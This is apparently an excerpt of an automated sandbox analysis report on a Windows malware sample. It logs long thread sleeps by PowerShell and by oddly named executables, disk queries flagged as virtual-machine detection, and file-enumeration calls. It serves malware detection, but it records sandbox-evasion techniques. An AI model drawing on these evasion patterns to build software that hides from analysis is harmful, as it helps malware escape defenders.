Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep count: 1948 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep count: 2453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 Thread sleep count: 2397 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372 Thread sleep count: 340 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep count: 1698 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep count: 2078 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8068 Thread sleep time: -30000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -599843s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -599705s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -599281s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -599000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -598578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -598297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8152 Thread sleep time: -7200000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -598047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -596172s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -595234s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -594859s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -594515s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -594319s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -594140s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -593832s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -593523s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -589297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -589047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -588625s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -588265s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -587984s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -587593s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -587000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -586656s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -586172s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -585949s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -585687s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -585437s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -585062s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -584780s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -584297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -583968s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -583656s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -583312s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -582922s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -582577s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -582234s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581922s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581730s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581591s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581390s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581218s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581018s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -579265s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -579047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8152 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -578875s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -578312s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -578130s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577984s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577872s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577748s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577621s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577449s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577328s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577156s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577017s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576863s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576718s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576462s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576353s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -574718s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -574359s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573713s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573450s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573338s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573230s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573125s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573015s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572905s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572794s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572650s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572546s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572421s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572179s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572019s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -571890s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -571781s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -571587s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -570031s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -569697s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -569318s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -569031s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568906s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568788s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568686s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568577s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568466s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568359s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568250s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6652 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\portintosvc\driverInto.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0100A69B
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0101C220
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101E6A3 VirtualQuery,GetSystemInfo, 0_2_0101E6A3
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99874 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99765 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99656 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99546 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99437 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99327 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99218 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99109 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99000 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98890 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98781 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98672 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98562 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98453 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98343 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98234 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98125 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98015 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 597282 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 596926 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 594834 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 594672 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 30000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599843
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599705
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599281
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 3600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 596172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 595234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594859
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594515
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594319
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594140
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 593832
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 593523
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 589297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 589047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 588625
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 588265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587593
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 586656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 586172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585949
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585687
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585437
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585062
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 584780
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 584297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583968
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581730
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581591
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581390
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581218
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581018
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 579265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 579047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 300000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578875
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578130
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577872
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577748
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577621
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577449
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577328
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577156
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577017
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576863
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576462
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576353
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 574718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 574359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573713
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573450
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573338
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573230
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573125
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573015
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572905
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572794
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572650
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572546
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572421
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572179
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572019
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571890
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571781
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571587
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 570031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569697
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569318
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568906
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568788
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568686
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568466
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568250
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: driverInto.exe, 00000004.00000002.1978002789.000000001B88F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
